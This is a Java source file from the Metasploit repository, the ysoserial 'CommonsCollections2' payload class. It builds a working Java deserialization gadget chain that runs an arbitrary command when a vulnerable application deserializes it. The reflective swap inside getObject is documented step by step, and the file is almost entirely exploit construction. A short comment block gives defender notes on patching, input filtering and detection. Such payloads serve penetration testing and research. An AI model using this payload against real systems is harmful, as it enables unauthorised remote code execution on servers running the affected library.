GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/CommonsCollections2.java
package ysoserial.payloads;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
/*
    Gadget chain:
        ObjectInputStream.readObject()
            PriorityQueue.readObject()
                ...
                    TransformingComparator.compare()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Runtime.exec()
 */
/**
 * Builds the object graph for the "CommonsCollections2" Java deserialization gadget chain.
 *
 * <p>The graph is a {@link PriorityQueue} whose comparator is a {@link TransformingComparator}
 * wrapping an {@link InvokerTransformer}. When such a queue is read back with
 * {@code ObjectInputStream.readObject()}, {@code PriorityQueue.readObject()} rebuilds the heap
 * and so calls the comparator on the stored elements; the transformer then reflectively invokes
 * its configured method on them.
 *
 * <p>Notes for defenders reviewing exposure to this chain:
 * <ul>
 *   <li>The chain needs commons-collections4 4.0 on the classpath of the deserializing
 *       application (see {@code @Dependencies}). Commons Collections 4.1 and later removed
 *       serialization support for {@code InvokerTransformer} and the other unsafe functors,
 *       so upgrading breaks this chain.</li>
 *   <li>The library fix does not replace input handling: untrusted bytes should not reach
 *       {@code ObjectInputStream.readObject()} at all, and where native serialization cannot
 *       be removed an allow-list {@code java.io.ObjectInputFilter} should reject unexpected
 *       classes.</li>
 *   <li>Serialized streams carry class names in clear text, so the fully qualified names of
 *       {@code InvokerTransformer}, {@code TransformingComparator} and {@code TemplatesImpl}
 *       inside inbound serialized data are a practical detection signal.</li>
 * </ul>
 */
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {

    /**
     * Assembles the queue that carries the gadget chain.
     *
     * <p>Statement order matters: the queue is filled while the transformer still points at a
     * harmless method, and only afterwards are the method name and the queue contents swapped
     * through reflection, so nothing fires while the object is being built.
     *
     * @param command string handed to {@code Gadgets.createTemplatesImpl}; that helper is defined
     *        elsewhere (presumably the command the embedded template runs; confirm against
     *        {@code Gadgets})
     * @return the prepared queue, ready to be serialized by the caller
     * @throws Exception if the helper or the reflective field access fails
     */
    public Queue<Object> getObject(final String command) throws Exception {
        final TemplatesImpl templatesGadget = Gadgets.createTemplatesImpl(command);

        // Placeholder method name: adding elements below already runs the comparator,
        // and calling toString() on the stub values is harmless.
        final InvokerTransformer invoker = new InvokerTransformer("toString", new Class[0], new Object[0]);
        final TransformingComparator comparator = new TransformingComparator(invoker);

        // Two stub entries give the backing array its final size; they are overwritten below.
        final PriorityQueue<Object> payloadQueue = new PriorityQueue<Object>(2, comparator);
        for (int i = 0; i < 2; i++) {
            payloadQueue.add(1);
        }

        // From here on the comparator would call newTransformer() on whatever it compares,
        // so the queue must not be modified through its public API any more.
        Reflections.setFieldValue(invoker, "iMethodName", "newTransformer");

        // Write straight into the private backing array to avoid triggering a comparison.
        final Object[] heap = (Object[]) Reflections.getFieldValue(payloadQueue, "queue");
        heap[0] = templatesGadget;
        heap[1] = 1;

        return payloadQueue;
    }

    /**
     * Command-line entry point; delegates to {@code PayloadRunner.run} with this payload class
     * and the raw arguments.
     *
     * @param args command-line arguments passed through unchanged
     * @throws Exception propagated from {@code PayloadRunner.run}
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections2.class, args);
    }

}